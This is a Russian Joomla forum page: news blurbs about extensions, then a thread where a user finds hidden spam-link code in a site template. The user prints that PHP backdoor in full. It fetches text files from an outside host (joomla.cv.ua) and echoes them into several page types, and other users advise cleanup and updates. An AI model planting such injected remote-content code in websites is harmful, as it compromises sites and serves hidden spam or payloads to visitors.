Новости Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

👩‍💻 Joomla REST API без прав суперадминистратора. RBAC в Joomla.На канале известного французского разработчика и специалиста по Joomla REST API Alexandre ELISÉ вышло новое видео.RBAC (Role-Based Access Control) - это управление доступом на основе ролей, метод управления доступом к ресурсам, основанный на назначении ролей пользователям. Вместо назначения прав каждому пользователю точечно права доступа группируются по ролям, а пользователи получают доступ к ресурсам уже в зависимости от своей роли. В контексте Joomla и REST API он может даже мешать работе: без авторизованного пользователя вы не можете даже показать контент. В видео показано как решить данную проблему. Создаётся "технический пользователь", которому разрешается просматривать контент, но не разрешено создавать, редактировать, удалять и т.д. И все запросы к REST API идут с использованием его токена. [fr-FR] Services Web API Joomla SANS être Super Admin RBAC natif avec Joomla@joomlafeed #joomla #разработка #rest

InterLinked - плагин автоматической внутренней перелинковки для Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

👩‍💻 InterLinked - плагин автоматической внутренней перелинковки для Joomla.Несвязанные статьи - это молчаливый убийца привлекательности вашего сайта на Joomla, который заставляет читателей сворачивать работу и подрывает эффективность вашего SEO. Content - InterLinked - это бесплатный, проверенный в боях плагин, который кладет конец этой бессмыслице, автоматически генерируя ссылки на основе ключевых слов между статьями на вашем сайте Joomla 5. Он создает сеть связей, используя ключевые слова статей (metakey) и ассоциации категорий, с настраиваемыми всплывающими подсказками, целевыми объектами ссылок и классами CSS, сохраняя при этом существующие ссылки и повышая производительность за счет кэширования. Кроме того, ссылки со временем меняются по мере того, как в новых статьях используются ключевые слова, что делает ваш контент свежим и актуальным.Возможности.- автоматическая перелинковка на основе значения meta-keywords материалов- встроенная поддержка материалов Joomla- пользовательские ассоциации категорий для создания ссылок (например "Блог" к "Учбеникам")- показ всплывающих подсказок к автоматическим ссылкам (опционально)- настраиваемый атрибут target для ссылок.- указание CSS класса для стилизации ссылок- кэширование совпадений ключевых слов и их ассоциаций- учёт существующих тегов <a> во избежание дублирующих ссылок- автоматическое добавление новых ссылок при появлении новых ассоциаций- веб-доступность: ARIA для ссылок с target="_blank".Плагин бесплатный. Заявлена поддержка Joomla 4 и Joomla 5.Joomla Extensions DirectoryСтраница расширенияСкачать@joomlafeed#joomla #расширения #seo

joomLab Gallery - плагин галереи изображений для Joomla

👩‍💻 joomLab Gallery - плагин галереи изображений для Joomla.Плагин joomLab Gallery позволит Вам добавлять в любой материал неограниченное количество галерей, а главное удобно управлять файлами и эффектами в каждой галерее.Плагин использует популярны скрипты Swiper.js и FancyBox. Первый для крутой организации и эффектов галерей, а второй для красивого и функционального показа оригинальных изображений на Вашем сайте.На данный момент плагин имеет 10 макетов вывода - это 10 различных эффектов галерей и Вы можете совмещать все 10 в 1 материале.Плагин позволяет гибко настраивать индивидуально каждую галерею в материале. Вы можете выбрать макет, эффекты и даже можете управлять функциями всплывающего окна изображения.Недостатки.Такой вид реализации не предусматривает выбор изображения на сервере. Т.е. Вы не можете выбрать уже добавленное фото, только загружать заново. Плагин не предоставляет возможности доступа к медиа-менеджеру.Плагин бесплатный. Разработчик - участник нашего сообщества Александр Новиков (@pro-portal).Страница расширения@joomlafeed#joomla #расширения

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 1683 Просмотров
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Чужие ссылки
« : 18.02.2016, 20:30:39 »
Поймал на сайте чужие ссылки.
Долго копал, не мог найти, откуда. Потом заметил, что у меня в разделе component перед жидоком стоит какой-то не понятный require_once
Он вызывает system.php (название -то какое!)
А там

Код: php
<?php
/* Это та самая блоха для Joomla, которую я поймал! */

	$app=JFactory::getApplication();
	$option5=$app->input->getCmd('option','');
	$view5=$app->input->getCmd('view','');
	$layout5=$app->input->getCmd('layout','');
	$menu5=$app->getMenu(); 
	$files = 'http://joomla.cv.ua/j32.txt';
	$file_headers = @get_headers($files);
	if(($menu5->getActive()==$menu5->getDefault())||($view5=='featured')) 
	if($file_headers[0] == 'HTTP/1.1 200 OK') 
		{ $content = file("http://joomla.cv.ua/j07.txt");
		$data = implode($content); 
		echo $data; } 
	if(($option5=='com_content')&&($view5=='category')&&($layout5!=='blog')) 
		if($file_headers[0] == 'HTTP/1.1 200 OK') 
		{ $content = file("http://joomla.cv.ua/j08.txt"); 
		$data = implode($content); echo $data; }
	if(($option5=='com_content')&&($view5=='article'))
	if($file_headers[0] == 'HTTP/1.1 200 OK') 
	{ $content = file("http://joomla.cv.ua/j09.txt"); 
	$data = implode($content); echo $data; } 
	if(($option5=='com_content')&&($layout5=='blog'))
	if($file_headers[0] == 'HTTP/1.1 200 OK') 
	{ $content = file("http://joomla.cv.ua/j10.txt"); 
	$data = implode($content); echo $data; }
	if (($option5=='com_content')&&($layout5=='default'))
	if($file_headers[0] == 'HTTP/1.1 200 OK')
	{ $content = file("http://joomla.cv.ua/j11.txt");
	$data = implode($content); echo $data; } 
?>

т.е. это какой-то Украинец, из Кабо Верде сидит и пишет текстовые файлы с такими вот пакостями, а они потом у меня появляются.
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Чужие ссылки
« Ответ #1 : 18.02.2016, 20:33:04 »
Взломали вас. Надо чистить сайтик. Какая версия Joomla?
Записан
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Чужие ссылки
« Ответ #2 : 18.02.2016, 21:13:57 »
Да это даже не ломали, а так просетапили. Версия 2.5 28
Там на хосте нельзя установить 3 - говорят, не хватит ресурса..
А меня позвали сайт делать, когда уже все было установлено и даже начато. Вот в шаблоне ict-novotela такая бяка.
Я то искал base64_decode даже sql прочесал. Ну, нету этих текстов и все! А они, оказывается, лежат вообще на другом адресе. Найдешь их, как-же!
Записан
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Чужие ссылки
« Ответ #3 : 18.02.2016, 21:19:44 »
если 2.5.28 с последними фиксами - то дыр в ней нет (скажем так пока не нашли :) ), так что обновляться на Ж3 не очень обязательно. ну по крайней мере из-за этой причины. соответственно, либо взломали до обновления, и прост о пока не проявляли себя, либо 2.5.28, но последние фиксы безопасности не установили. тогда 2.5.28 дырявая.
Записан
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

LadaDed

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Re: Чужие ссылки
« Ответ #4 : 18.02.2016, 21:34:27 »
Да, надо будет там все обновить..
Я как-то привык на Амиро все делать, Дорого, конечно, но зато все такие штуки-дрюки не моя проблема.
Если что-то глючит - в службу поддержки и пускай они там и морочатся.
Но это были интернет-магазины, потом для ресторана делал, Там народ с деньгами, Сами говорят - не надо нам экономии, надо быстро и надежно.
А тут небольшой сайтик, практически, знакомые попросили.
А скупой платит дважды.
Записан
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Чужие ссылки
« Ответ #5 : 19.02.2016, 09:15:56 »
Цитата: LadaDed от 18.02.2016, 21:34:27
А скупой платит дважды.
Даже трижды.

Добавлю, что целевой взлом сайта делается крайне редко, сейчас это работает не так, как в лихих 90-х, сейчас программы ломают сайты тоннами. И ваш, скорее всего, не исключение. dmitry_stas правильно сказал, 2.5.28 вполне себе неплохая, но она редко используется в чистом виде. Обычно обвешана различными расширениями, через них и получают доступ.
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Чужие ссылки
« Ответ #6 : 19.02.2016, 10:39:41 »
та там даже без сторонних расширений может быть проблема. я имел в виду, что просто установленной 2.5.28 мало для уверенности в безопасности. там было еще 2 фикса безопасности выпущено, а версия не менялась при этом, потому что фиксы были выпущены когда поддержка 2.5 уже закончилась.
Записан
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

natalyaegorova

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Чужие ссылки
« Ответ #7 : 03.08.2016, 00:55:15 »
Ребят, ради бога, подскажите что делать. Поймала на сайте такую же вредоносную фигню с Joomla.cv.ua!  Как от него избавиться? Сайт третьи сутки "висит"! Прописался в шаблоне в файле system.php. ДЖ версия 3.4.8.
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Чужие ссылки
« Ответ #8 : 03.08.2016, 09:50:14 »
Удалять, лечить, обновлять.
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

 Ответов: 2
Просмотров: 2223 		Последний ответ 14.02.2024, 13:15:59
от wishlight
Непонятные ссылки в индексе Яндекс

Автор Forgiving

 Ответов: 16
Просмотров: 1425 		Последний ответ 13.09.2021, 14:17:20
от ForQue
Вирус на сайте, генерирующий ссылки на магазин.

Автор chernykh

 Ответов: 15
Просмотров: 1827 		Последний ответ 23.04.2018, 21:58:08
от ProtectYourSite
Ссылки типа ?page=Igri-onlajn-na-dengi-avtomati-vulkan

Автор orkl

 Ответов: 4
Просмотров: 1328 		Последний ответ 13.04.2017, 20:54:51
от ProtectYourSite
Левые ссылки на сайте. Как бороться?!

Автор k.upak

 Ответов: 28
Просмотров: 1752 		Последний ответ 20.02.2017, 20:18:44
от flyingspook